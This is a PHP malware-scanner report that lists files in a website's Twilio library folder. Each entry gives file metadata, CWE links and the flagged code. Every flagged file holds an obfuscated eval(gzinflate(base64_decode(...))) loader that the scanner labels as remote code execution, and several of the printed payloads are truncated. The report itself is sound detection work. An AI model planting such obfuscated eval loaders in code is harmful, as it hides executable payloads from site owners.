<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMAxA74X+Qw+DbaBfIHjx5NXtPmqXYWCkJUlVEP/djg128JFDIO/FGmvC7EVcB/zEADL0L5wxDjcQHS6RJmCgANa4ArwVaPyXryTqi1WimHmxP2uQOCoEhdFNmYJiJIeE2lRhRiA9uCoztqu7JQuVPlCOZwHNqct33t5KsysLdfKsGDB5Uqn3W3ta9681ZX4MkW3j5AAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Conferences.php

Size: 187.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3zs9LSy1KzQOK83IpAEFqRUlqXgqmap/M4hKgjvzSouRUXq5qXq5aXi4AxbHgJVwAAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3zs9LSy1KzQOK83IpAEFqRUlqXgqmap/M4hKgjvzSouRUXq5qXq5aXi4AxbHgJVwAAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/ConnectApp.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3zs/LS00ucSwo4OVSAILUipLUvBRMxZ55xSWJecmpQE35pUXJqbxc1bxctbxcAOolpRdfAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3zs/LS00ucSwo4OVSAILUipLUvBRMxZ55xSWJecmpQE35pUXJqbxc1bxctbxcAOolpRdfAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/ConnectApps.php

Size: 303.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMBBE74H8wx4KbcE/EA9avKkH9V7WZKWBmIRkayviv5sSbw5zmWHeSCGFspgSXCg+jaLUXydjje/PlLjvvHOkeBtCkgKyaGZy+n99MIkz4ceoSIp3GYfxZo2C++gUG+9ARUKmpnL4oBVgjPiCKmDER4JNyU3bFvZ3sYiH6CdwNMEO9ZF48LpDa/ezorD8NvXJM+TGT6Trdl3IjxTZXy599bzgAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMBBE74H8wx4KbcE/EA9avKkH9V7WZKWBmIRkayviv5sSbw5zmWHeSCGFspgSXCg+jaLUXydjje/PlLjvvHOkeBtCkgKyaGZy+n99MIkz4ceoSIp3GYfxZo2C++gUG+9ARUKmpnL4oBVgjPiCKmDER4JNyU3bFvZ3sYiH6CdwNMEO9ZF48LpDa/ezorD8NvXJM+TGT6Trdl3IjxTZXy599bzgAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Credential.php

Size: 395.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJXQsU7DQAwG4D3SvYPnDO1Ap2wVEyt0j4zPJUbhEtkORUK8O9ekoDSFIm453fm/T/aFIhTrsgwFlLAFk/TUMtwqR04u2B7vx9pqBX3TV+iuVQURnWtSzlv8juS1a3isgTdzBQ5osIz/IA59/I+4jJ+LJmfQFm42QA0qkrOCueZZs4oOMqJ7YctnMegen5n8FxaJuiF5veCPfZ5KE3oadxLprw8djDXhCy/Jr3vo9pM0+4KrbQ4qF5bKdWYdCmrRDB5YX4XY6t1BWunqezavZ0/4zTnFy9xdMsdEnPPdoMTwDh+h+ATN9PNeYwIAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJXQsU7DQAwG4D3SvYPnDO1Ap2wVEyt0j4zPJUbhEtkORUK8O9ekoDSFIm453fm/T/aFIhTrsgwFlLAFk/TUMtwqR04u2B7vx9pqBX3TV+iuVQURnWtSzlv8juS1a3isgTdzBQ5osIz/IA59/I+4jJ+LJmfQFm42QA0qkrOCueZZs4oOMqJ7YctnMegen5n8FxaJuiF5veCPfZ5KE3oadxLprw8djDXhCy/Jr3vo9pM0+4KrbQ4qF5bKdWYdCmrRDB5YX4XY6t1BWunqezavZ0/4zTnFy9xdMsdEnPPdoMTwDh+h+ATN9PNeYwIAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJXQsU7DQAwG4D3SvYPnDO1Ap2wVEyt0j4zPJUbhEtkORUK8O9ekoDSFIm453fm/T/aFIhTrsgwFlLAFk/TUMtwqR04u2B7vx9pqBX3TV+iuVQURnWtSzlv8juS1a3isgTdzBQ5osIz/IA59/I+4jJ+LJmfQFm42QA0qkrOCueZZs4oOMqJ7YctnMegen5n8FxaJuiF5veCPfZ5KE3oadxLprw8djDXhCy/Jr3vo9pM0+4KrbQ4qF5bKdWYdCmrRDB5YX4XY6t1BWunqezavZ0/4zTnFy9xdMsdEnPPdoMTwDh+h+ATN9PNeYwIAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/CredentialList.php

Size: 535.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJWSPW/CQAyGd6T8Bw9IfKiFoZ2oVAl1qtQJ2KPj4jSu0rvo7JRWFf+9vvARSGHAS+7y2o/82pf0kt50PE56MIY5MLn3EuElYIZOyJRvxBK1Rp9MoCqqmREJsxlkRjC1AfWTHVM0VgU2Goge7JEEpaJgYxi6NRewdZXdjO3WnGOZzmhzeHgEW5hgrGAAlqDOFW0EqCHnhKx3YvDrD7TXhmCs9bWTtIOPze6lHXTv+VLzV8h5IHRZ+ZM684ld9kGEKILPb+DWgbo0/XUbg+t1QPZ1sLqqQNwFnugMhtlbatxvSIrdULsLHLZPjkcRNU30YdpSi2GJ4YuUlK42VJJPF8iSnj9RwG/RgfzPfXUsxllc7NuBX4VrVMGLblV7ymtnhbwDciTDvi11snIHffU1OmTH6Me+758Zpa6WJ/6GbUqMQeuMB600etqdt0lvG539AUmd70R3AwAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJWSPW/CQAyGd6T8Bw9IfKiFoZ2oVAl1qtQJ2KPj4jSu0rvo7JRWFf+9vvARSGHAS+7y2o/82pf0kt50PE56MIY5MLn3EuElYIZOyJRvxBK1Rp9MoCqqmREJsxlkRjC1AfWTHVM0VgU2Goge7JEEpaJgYxi6NRewdZXdjO3WnGOZzmhzeHgEW5hgrGAAlqDOFW0EqCHnhKx3YvDrD7TXhmCs9bWTtIOPze6lHXTv+VLzV8h5IHRZ+ZM684ld9kGEKILPb+DWgbo0/XUbg+t1QPZ1sLqqQNwFnugMhtlbatxvSIrdULsLHLZPjkcRNU30YdpSi2GJ4YuUlK42VJJPF8iSnj9RwG/RgfzPfXUsxllc7NuBX4VrVMGLblV7ymtnhbwDciTDvi11snIHffU1OmTH6Me+758Zpa6WJ/6GbUqMQeuMB600etqdt0lvG539AUm...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJWSPW/CQAyGd6T8Bw9IfKiFoZ2oVAl1qtQJ2KPj4jSu0rvo7JRWFf+9vvARSGHAS+7y2o/82pf0kt50PE56MIY5MLn3EuElYIZOyJRvxBK1Rp9MoCqqmREJsxlkRjC1AfWTHVM0VgU2Goge7JEEpaJgYxi6NRewdZXdjO3WnGOZzmhzeHgEW5hgrGAAlqDOFW0EqCHnhKx3YvDrD7TXhmCs9bWTtIOPze6lHXTv+VLzV8h5IHRZ+ZM684ld9kGEKILPb+DWgbo0/XUbg+t1QPZ1sLqqQNwFnugMhtlbatxvSIrdULsLHLZPjkcRNU30YdpSi2GJ4YuUlK42VJJPF8iSnj9RwG/RgfzPfXUsxllc7NuBX4VrVMGLblV7ymtnhbwDciTDvi11snIHffU1OmTH6Me+758Zpa6WJ/6GbUqMQeuMB600etqdt0lvG539AUm...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/UsageTrigger.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMOwrAMAzF9oDv4Ot07WcOwX0EQ0jATj9Qevdmr2ZJFChISe68wE4VeFwvLdriDO9x85SxmuYMo8AD3B11/+tT9Z6qYGTtMAE//NKYf7pU3RthAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMOwrAMAzF9oDv4Ot07WcOwX0EQ0jATj9Qevdmr2ZJFChISe68wE4VeFwvLdriDO9x85SxmuYMo8AD3B11/+tT9Z6qYGTtMAE//NKYf7pU3RthAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/CredentialListMapping.php

Size: 475.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI2SUUvDQAzH3wv9DnkYbB26vVcQhk+Cvmx7L+c1tYHuelxSp4jf3dzmrO0mLBR65P/Pr0l6aZImy/k8TWAOK2Byrw3CQ8ASnZBpnojl2Xiv+Wg52BYL8LXPjUjIcyiNYGED6qv8tWhsazxoIDUx7I4M2BuGsfkCr/Pl9byxechjOsNoCtpqAPqnuAqErmw+Cmd2OMacRIjilcAu0BijqSuLuXsJyG0XrG4oEJ/N1esMhrm1FBcDe5J6uLZZ/4c5i4hlqvfANloEGwxvpIRiu6eG2mKNLMXFGwH4LrqB85JHx2KcxfVPN/Cp39DwoRW0saWqc1aodUCOZDaxja5SbmCiY2Und4xJbPv2nlE6v/kz3qy3xJjafp5pL2V3x/NXmujzDeqg5G/rAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2SUUvDQAzH3wv9DnkYbB26vVcQhk+Cvmx7L+c1tYHuelxSp4jf3dzmrO0mLBR65P/Pr0l6aZImy/k8TWAOK2Byrw3CQ8ASnZBpnojl2Xiv+Wg52BYL8LXPjUjIcyiNYGED6qv8tWhsazxoIDUx7I4M2BuGsfkCr/Pl9byxechjOsNoCtpqAPqnuAqErmw+Cmd2OMacRIjilcAu0BijqSuLuXsJyG0XrG4oEJ/N1esMhrm1FBcDe5J6uLZZ/4c5i4hlqvfANloEGwxvpIRiu6eG2mKNLMXFGwH4LrqB85JHx2KcxfVPN/Cp39DwoRW0saWqc1aodUCOZDaxja5SbmCiY2Und4xJbPv2nlE6v/kz3qy3xJjafp5pL2V3x/NXmujzDeqg5G/rAgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2SUUvDQAzH3wv9DnkYbB26vVcQhk+Cvmx7L+c1tYHuelxSp4jf3dzmrO0mLBR65P/Pr0l6aZImy/k8TWAOK2Byrw3CQ8ASnZBpnojl2Xiv+Wg52BYL8LXPjUjIcyiNYGED6qv8tWhsazxoIDUx7I4M2BuGsfkCr/Pl9byxechjOsNoCtpqAPqnuAqErmw+Cmd2OMacRIjilcAu0BijqSuLuXsJyG0XrG4oEJ/N1esMhrm1FBcDe5J6uLZZ/4c5i4hlqvfANloEGwxvpIRiu6eG2mKNLMXFGwH4LrqB85JHx2KcxfVPN/Cp39DwoRW0saWqc1aodUCOZDaxja5SbmCiY2Und4xJbPv2nlE6v/kz3qy3xJjafp5pL2V3x/NXmujzDeqg5G/rAgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/UsageTriggers.php

Size: 763.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1TXYtaMRB9X/A/DCqsWvW+27q0CH1aKGy1r3djHK+hMbmdJGul9L83X9frB7bQPIRMODlz5mSm89B54JIZA1+R3gRHUy4PQgpdvqCx5cqwCpckqgrJAP60qDa30GdhrIdrRxzhV8dTgl+1W0vBYesUt0IrKEuulbHkuB30uRSo7Bj6jsQwvIG8wgXMoSasSsJaMo6Dbu9CR687hm68KZqrbmZ63xLVjHyG2ex+2gz+3QguRqP8fAQLQmYRGCg8wHn2E+KjT8D24JmFqqDPPbzSdITlDuEU6C248Bishq2gQGgTD2w1TeGTt0dKkN7AgM3vBBp/VLBGj3JqA0KB9bSvUQgsWtRGc7f3FbHo8IedtfWsKA6Hw9TGr5lyvS88yBSsFgX5Ly2ingkh17QxvRS1eZ9ey+m9Et+YdAifQxlBTVPIYYcqV8lJG+Nl2Z0wEOF3yRzJaNXq5TmYQ/jDeXWJ7Jw9uGZuWBgRO0I...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1TXYtaMRB9X/A/DCqsWvW+27q0CH1aKGy1r3djHK+hMbmdJGul9L83X9frB7bQPIRMODlz5mSm89B54JIZA1+R3gRHUy4PQgpdvqCx5cqwCpckqgrJAP60qDa30GdhrIdrRxzhV8dTgl+1W0vBYesUt0IrKEuulbHkuB30uRSo7Bj6jsQwvIG8wgXMoSasSsJaMo6Dbu9CR687hm68KZqrbmZ63xLVjHyG2ex+2gz+3QguRqP8fAQLQmYRGCg8wHn2E+KjT8D24JmFqqDPPbzSdITlDuEU6C248Bishq2gQGgTD2w1TeGTt0dKkN7AgM3vBBp/VLBGj3JqA0KB9bSvUQgsWtRGc7f3FbHo8IedtfWsKA6Hw9TGr5lyvS88yBSsFgX5Ly2ingkh17QxvRS1eZ9ey+m9Et+YdAifQxlBTVPIYYcqV8lJG+Nl2Z0wEOF...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1TXYtaMRB9X/A/DCqsWvW+27q0CH1aKGy1r3djHK+hMbmdJGul9L83X9frB7bQPIRMODlz5mSm89B54JIZA1+R3gRHUy4PQgpdvqCx5cqwCpckqgrJAP60qDa30GdhrIdrRxzhV8dTgl+1W0vBYesUt0IrKEuulbHkuB30uRSo7Bj6jsQwvIG8wgXMoSasSsJaMo6Dbu9CR687hm68KZqrbmZ63xLVjHyG2ex+2gz+3QguRqP8fAQLQmYRGCg8wHn2E+KjT8D24JmFqqDPPbzSdITlDuEU6C248Bishq2gQGgTD2w1TeGTt0dKkN7AgM3vBBp/VLBGj3JqA0KB9bSvUQgsWtRGc7f3FbHo8IedtfWsKA6Hw9TGr5lyvS88yBSsFgX5Ly2ingkh17QxvRS1eZ9ey+m9Et+YdAifQxlBTVPIYYcqV8lJG+Nl2Z0wEOF...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/CredentialListMappings.php

Size: 607.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1SwU7DMAy9T9o/WNOkroOOexGVEHBAAgkxDrtVIfE2iyyp4pQxEP+O225DYxM+ubGf3/Or+71+T1vFDFMM76SRy5c1WfLlM3IsbwIadJGUfSCOj6qqyC0Y8COiM8eY6f1T0ydQXweN8NWX8SBxMR53CYxBZqqIDAocruEkA5DjqJzGHWgPvvtQq8oi1KwWmB+VJxPQ3mD2ar1+y3OoltVRTxtDbUlos0Jp7esmYaqywviVEu6sWGAcJdPb2WyWpFmh9yJLKyrL1daItiLLjAY3D7P/YpBeHunIKxXUCjiGZuPhXw4mk0NcIkgCft6mh2bBxtdJQFDGNBOilx5i6HaY/OVRIagNDNsPzsV9FpA42b0LQVvBiIFhvSS9BJnFGISMPtGAcubQQhYlYCigjnbTsSN0hwDXT/d7ARddUtWvljTMa6cjeQdb507tfb6TCVedvFGaNrcE2wgY6+AawQLM83I7qmv9bWsiObR...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1SwU7DMAy9T9o/WNOkroOOexGVEHBAAgkxDrtVIfE2iyyp4pQxEP+O225DYxM+ubGf3/Or+71+T1vFDFMM76SRy5c1WfLlM3IsbwIadJGUfSCOj6qqyC0Y8COiM8eY6f1T0ydQXweN8NWX8SBxMR53CYxBZqqIDAocruEkA5DjqJzGHWgPvvtQq8oi1KwWmB+VJxPQ3mD2ar1+y3OoltVRTxtDbUlos0Jp7esmYaqywviVEu6sWGAcJdPb2WyWpFmh9yJLKyrL1daItiLLjAY3D7P/YpBeHunIKxXUCjiGZuPhXw4mk0NcIkgCft6mh2bBxtdJQFDGNBOilx5i6HaY/OVRIagNDNsPzsV9FpA42b0LQVvBiIFhvSS9BJnFGISMPtGAcubQQhYlYCigjnbTsSN0hwDXT/d7ARddUtWvljTMa6cjeQdb507tfb6TCVe...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1SwU7DMAy9T9o/WNOkroOOexGVEHBAAgkxDrtVIfE2iyyp4pQxEP+O225DYxM+ubGf3/Or+71+T1vFDFMM76SRy5c1WfLlM3IsbwIadJGUfSCOj6qqyC0Y8COiM8eY6f1T0ydQXweN8NWX8SBxMR53CYxBZqqIDAocruEkA5DjqJzGHWgPvvtQq8oi1KwWmB+VJxPQ3mD2ar1+y3OoltVRTxtDbUlos0Jp7esmYaqywviVEu6sWGAcJdPb2WyWpFmh9yJLKyrL1daItiLLjAY3D7P/YpBeHunIKxXUCjiGZuPhXw4mk0NcIkgCft6mh2bBxtdJQFDGNBOilx5i6HaY/OVRIagNDNsPzsV9FpA42b0LQVvBiIFhvSS9BJnFGISMPtGAcubQQhYlYCigjnbTsSN0hwDXT/d7ARddUtWvljTMa6cjeQdb507tfb6TCVe...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/CredentialLists.php

Size: 563.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAGVSXUsDMRB8F/ofhlJor/bj/cSCiIKgUtT3I+a2NpjmjmzOWsX/7uY+Wmv34dhsZmdmN9c7651pq5jxTP7DaOLsZWusKbIn4pBde8rJBaPsveHAoM9ALj8FP98tI0B6isprwndPeCExH4+bBGMImQrEUHC0xTE1jOOgnKYOve+6+VSb0hIqVm+UnlzPZtBFTtNXW+j3NEW5Lk8wdQy0NaI3XSitiyombMrpQu9tZDaOWFfE5qj/sLv10pHb3aPaUD+5OOFNS+XVBhy8cW8YrFp45gSfIqwJXQmxhGIlRcM4aCJq/udT3qsdBvWBU1kXC71soKkLSX1DgTxjuzZ6DeFk8sJnviiHcvnx6CxiyI0nHcRKKGprzcvhank369DzJimrV2s0VpXTwRQO7UKO55t0BnHZGBslSXx2tOEpVN5FqyKepllL0kAPsBjDv3se4nLxb5WTAzzBeafbvcdP/NXk8ws3JBUEygIAAA=...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGVSXUsDMRB8F/ofhlJor/bj/cSCiIKgUtT3I+a2NpjmjmzOWsX/7uY+Wmv34dhsZmdmN9c7651pq5jxTP7DaOLsZWusKbIn4pBde8rJBaPsveHAoM9ALj8FP98tI0B6isprwndPeCExH4+bBGMImQrEUHC0xTE1jOOgnKYOve+6+VSb0hIqVm+UnlzPZtBFTtNXW+j3NEW5Lk8wdQy0NaI3XSitiyombMrpQu9tZDaOWFfE5qj/sLv10pHb3aPaUD+5OOFNS+XVBhy8cW8YrFp45gSfIqwJXQmxhGIlRcM4aCJq/udT3qsdBvWBU1kXC71soKkLSX1DgTxjuzZ6DeFk8sJnviiHcvnx6CxiyI0nHcRKKGprzcvhank369DzJimrV2s0VpXTwRQO7UKO55t0BnHZGBslSXx2tOEpVN5FqyKepllL0kAPsBjDv3se4nL...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGVSXUsDMRB8F/ofhlJor/bj/cSCiIKgUtT3I+a2NpjmjmzOWsX/7uY+Wmv34dhsZmdmN9c7651pq5jxTP7DaOLsZWusKbIn4pBde8rJBaPsveHAoM9ALj8FP98tI0B6isprwndPeCExH4+bBGMImQrEUHC0xTE1jOOgnKYOve+6+VSb0hIqVm+UnlzPZtBFTtNXW+j3NEW5Lk8wdQy0NaI3XSitiyombMrpQu9tZDaOWFfE5qj/sLv10pHb3aPaUD+5OOFNS+XVBhy8cW8YrFp45gSfIqwJXQmxhGIlRcM4aCJq/udT3qsdBvWBU1kXC71soKkLSX1DgTxjuzZ6DeFk8sJnviiHcvnx6CxiyI0nHcRKKGprzcvhank369DzJimrV2s0VpXTwRQO7UKO55t0BnHZGBslSXx2tOEpVN5FqyKepllL0kAPsBjDv3se4nL...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Credentials.php

Size: 639.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJVTQU8qMRC+m/AfJsQEFhe8r5HEGA8mHoi8l3DblO4A1dJuOl1Xn/G/vymlrEA8OIfNTOfr16/zdXsXvQupBRHM0b0piVT+aZVWtnxG8uW9wwqNV0IT4LtHU50D54+zJ0We8bZxEuGzx5zAcT0axQRGwETCI4EAgy10tKAMeWEkJuRhx8O72NYaoSGxxuKsDZMJSFvheKmtfC0KqDf1OSjEpdSKDxtPhZS2CQmpejyVBw2lZvk0nq7RDwf3T4vFYpB979OuYPnDY+IQ/buW773Fv4TOiC32c+jPmxrdHHmPn/FkW+uqfn68Nbs501rUwoktkHfKrOGy2RMW4DdhCLGClXW7hZMp2uULSv8TV71XEblS9Tsu4Zz4CFRcUME+ElOzPXHdrmDXQY+OoN0ouQFFwKqZUf3DCoSpjkdAfBxUyvFZ+gO83UmJTwruZo+ThL6OSd0stZKwaoz0yhrYO3KYU95dM08y4TbKG2Z...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVTQU8qMRC+m/AfJsQEFhe8r5HEGA8mHoi8l3DblO4A1dJuOl1Xn/G/vymlrEA8OIfNTOfr16/zdXsXvQupBRHM0b0piVT+aZVWtnxG8uW9wwqNV0IT4LtHU50D54+zJ0We8bZxEuGzx5zAcT0axQRGwETCI4EAgy10tKAMeWEkJuRhx8O72NYaoSGxxuKsDZMJSFvheKmtfC0KqDf1OSjEpdSKDxtPhZS2CQmpejyVBw2lZvk0nq7RDwf3T4vFYpB979OuYPnDY+IQ/buW773Fv4TOiC32c+jPmxrdHHmPn/FkW+uqfn68Nbs501rUwoktkHfKrOGy2RMW4DdhCLGClXW7hZMp2uULSv8TV71XEblS9Tsu4Zz4CFRcUME+ElOzPXHdrmDXQY+OoN0ouQFFwKqZUf3DCoSpjkdAfBxUyvFZ+gO83UmJTwruZo+ThL6...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVTQU8qMRC+m/AfJsQEFhe8r5HEGA8mHoi8l3DblO4A1dJuOl1Xn/G/vymlrEA8OIfNTOfr16/zdXsXvQupBRHM0b0piVT+aZVWtnxG8uW9wwqNV0IT4LtHU50D54+zJ0We8bZxEuGzx5zAcT0axQRGwETCI4EAgy10tKAMeWEkJuRhx8O72NYaoSGxxuKsDZMJSFvheKmtfC0KqDf1OSjEpdSKDxtPhZS2CQmpejyVBw2lZvk0nq7RDwf3T4vFYpB979OuYPnDY+IQ/buW773Fv4TOiC32c+jPmxrdHHmPn/FkW+uqfn68Nbs501rUwoktkHfKrOGy2RMW4DdhCLGClXW7hZMp2uULSv8TV71XEblS9Tsu4Zz4CFRcUME+ElOzPXHdrmDXQY+OoN0ouQFFwKqZUf3DCoSpjkdAfBxUyvFZ+gO83UmJTwruZo+ThL6...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Domain.php

Size: 715.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

